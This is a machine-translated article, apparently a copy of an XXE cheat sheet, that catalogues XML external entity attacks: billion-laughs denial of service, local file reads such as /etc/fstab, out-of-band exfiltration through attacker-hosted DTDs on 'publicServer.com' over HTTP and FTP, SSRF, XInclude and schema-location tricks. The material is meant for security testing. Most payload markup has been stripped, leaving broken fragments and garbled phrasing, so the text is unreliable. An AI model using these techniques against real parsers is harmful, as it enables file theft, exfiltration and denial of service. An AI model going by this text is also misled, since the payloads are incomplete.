Analysis of Different Types of DTD/XXE attacks
When evaluating the security of XML-based services, you cannot forget the DTD-based attacks, such as XML external entity injection attacks (XXE ).
In this article, we will provide a comprehensive list of attacks against different types of DTD.
Attacks are classified as follows:
Denial of Service Attack (DDoS)
Basic XXE attacks
Advanced XXE attacks
Server Request Forgery (SSRF)
XML inclusion mechanism (XInclude)
Extended style sheet conversion language (XSLT)
Denial of Service (DDoS) supports entity testing:
]>&a2;
If the parsing process changes very slowly, the test is successful, that is, the target parser configuration may be vulnerable to at least one DDoS attack.
Billion Laughs attack (Klein, 2002)
Note: "Billion Laughs" attack-generate a Billion "Ha!" In memory by creating a recursive XML definition !" String, resulting in DDoS attacks. The principle is: Construct malicious XML entity files to exhaust available memory, because many XML Parser tends to keep its entire structure in memory when parsing XML documents.
]>&a4;
This file is only 30 Kb in size, but has 11111 entity references, which exceeds the maximum number of valid entity references.
Source
Billion Laughs attack-parameter entity (Sp? Th, 2015)
]>&g;
File located: http://publicServer.com/dos.dtd
XML second cracking DDoS Attack
&a0;&a0;...&a0;
Source
General entity Recursion
It is best not to use Recursion-[WFC: No Recursion]
]>&a;
External entity (Steuck, 2002)
This attack is performed by declaring an external entity and then referencing a large file (for example, C:/pagefile. sys or/dev/random) located online or locally ).
However, this attack only allows the parser to parseHuge XML file.
]>&dos;
Source
Basic XXE attacks (Steuck, 2002)
]>&file;
Take the file '/sys/power/image_size' as an example, because it is very short and has only one line and does not contain special characters.
This type of attack requires a direct feedback channel and the access to files is restricted by prohibited characters in XML, such as "<" and "&".
If these banned characters appear in the file to be accessed (for example,/etc/fstab), the XML Parser throws an error and stops parsing.
Source
XXE attack using netdoc
]>&file;
Source: @ Nirgoldshlager
Advanced XXE attack-direct feedback channel
These attacks are advanced XXE attacks used to bypass restrictions on basic XXE attacks and OOB (out-of-band data) attacks.
Attackers can bypass the limitations of XXE attacks (Morgan, 2014)
%dtd;]>&all;
File located: http://publicServer.com/parameterEntity_core.dtd
Source
XXE attacks that abuse attribute values
%remote;]>
File located: http://publicServer.com/external_entity_attribute.dtd
%param1;
Source
Advanced XXE attack-OOB data (OOB) Channel
There is no channel for direct return, which does not mean there is no XXE attack.
Xxe oob attack (Yunusov, 2013)
&send;
File located: http://publicServer.com/parameterEntity_oob.dtd
%all;
Source
Xxe oob attack-parameter entity (Yunusov, 2013)
The difference is that only parameter entities are used.
%remote;%send;]>4
File located: http://publicServer.com/parameterEntity_sendhttp.dtd
%param1;
Source
Xxe oob attack-parameter entity FTP (Novikov, 2014)
Using the FTP protocol, attackers can read files of any length.
%remote;%send;]>4
File located: http://publicServer.com/parameterEntity_sendftp.dtd
%param1;
For this attack, you need to configure the FTP server. However, this POC code can be used on any parser with slight adjustments.
Source
SchemaEntity attack (Sp? Th, 2015)
There are three different attack methods: (I) schemaLocation, (ii) noNamespaceSchemaLocation, and (iii) XInclude.
SchemaLocation
%remote; ]>
4
NoNamespaceSchemaLocation
%remote; ]>
XInclude
%remote; ]>
File located: http://publicServer.com/external_entity_attribute.dtd
%param1;
SSRF attack DOCTYPE
]>4
External entity (Steuck, 2002)
]>&remote;
Although it is best to reference a well-formed XML file (or any text file) to avoid errors, some Resolvers may still call files with incorrect URL reference formats.
Source
External parameter entity (Yunusov, 2013)
%remote; ]>4
File located: http://publicServer.com/url_invocation_parameterEntity.dtd
Source
XInclude
File located: http://publicServer.com/file.xml
it_works
SchemaLocation
4
File located: http://publicServer.com/url_invocation_schemaLocation.xsd
Or use this file.
NoNamespaceSchemaLocation
4
File located: http://publicServer.com/url_invocation_noNamespaceSchemaLocation.xsd
XInclude attack (Morgan, 2014)
Source
XSLT attacks